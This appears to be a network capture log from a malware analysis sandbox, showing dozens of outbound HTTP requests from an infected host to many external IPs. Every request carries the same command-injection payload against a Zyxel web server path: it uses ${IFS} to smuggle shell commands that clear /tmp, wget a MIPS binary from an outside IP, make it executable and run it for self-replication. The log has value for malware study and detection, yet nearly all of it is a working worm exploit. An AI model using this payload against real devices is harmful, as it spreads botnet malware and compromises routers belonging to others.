                                            Jan 14, 2024 15:50:40.439022064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4710192.168.2.234380424.50.107.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439059019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4711192.168.2.235888470.77.250.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439085960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4712192.168.2.235270657.213.4.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439121962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4713192.168.2.235627831.95.175.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439160109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4714192.168.2.235793862.238.130.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439207077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4715192.168.2.2353152123.228.239.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439241886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4716192.168.2.2342360219.218.167.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439275980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4717192.168.2.235365039.227.35.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439308882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4718192.168.2.2346234180.138.111.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439330101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4719192.168.2.2335578177.66.188.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439352989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4720192.168.2.2357044125.197.51.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439383030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4721192.168.2.2351968147.55.242.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439435959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4722192.168.2.2359314175.186.252.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439465046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4723192.168.2.236071064.48.125.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439486980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4724192.168.2.2334208213.72.178.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439513922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4725192.168.2.2359224154.234.202.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439552069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4726192.168.2.235380070.243.218.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439575911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4727192.168.2.2359008166.223.152.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439599991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4728192.168.2.235702466.174.208.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439609051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4729192.168.2.234202431.16.24.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439636946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4730192.168.2.234407859.70.137.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439660072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4731192.168.2.233940434.0.153.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439686060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4732192.168.2.2336660158.126.101.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439713001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4733192.168.2.2358274219.127.243.175443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439718008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4734192.168.2.2343428138.239.54.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439738989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4735192.168.2.2334230168.222.163.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439779997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4736192.168.2.2357086191.149.204.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439812899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4737192.168.2.2354062206.88.158.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439841032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4738192.168.2.233590484.25.16.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439862967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4739192.168.2.23446468.104.118.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439915895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4740192.168.2.235105248.239.72.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439932108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4741192.168.2.234118246.20.103.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.439981937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4742192.168.2.235220443.198.160.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440006971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4743192.168.2.2354360159.226.245.232443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440025091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4744192.168.2.234310245.233.72.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440036058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4745192.168.2.2346764102.80.28.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440062046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4746192.168.2.2354678197.75.23.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440076113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4747192.168.2.2354954170.14.23.42443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440104961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4748192.168.2.2333566206.237.119.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440154076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4749192.168.2.2354510220.45.164.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440179110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4750192.168.2.2353566217.37.72.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440188885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4751192.168.2.235105060.179.117.207443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440233946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4752192.168.2.233470653.201.68.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440272093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4753192.168.2.233910632.206.23.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440298080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4754192.168.2.2353022219.149.90.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440321922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4755192.168.2.2336676184.141.108.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440335035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4756192.168.2.2337592206.8.147.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440515995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4757192.168.2.2333612196.54.84.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440538883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4758192.168.2.2337108106.153.169.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440565109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4759192.168.2.2346514209.23.182.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440607071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4760192.168.2.234820845.121.64.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.440624952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4761192.168.2.2334814169.82.82.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444014072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4762192.168.2.233747480.241.119.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444034100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4763192.168.2.234098827.250.187.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444053888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4764192.168.2.2356204166.173.54.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444111109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4765192.168.2.234443244.6.99.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444138050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4766192.168.2.235810296.232.162.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444169044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4767192.168.2.234868092.94.80.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444178104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4768192.168.2.2350718211.116.182.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444221020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4769192.168.2.23493382.194.60.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444231987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4770192.168.2.2352334221.167.18.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444273949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4771192.168.2.2359690161.27.193.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444288015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4772192.168.2.2359256203.35.109.246443
                                            TimestampBytes transferredDirectionData
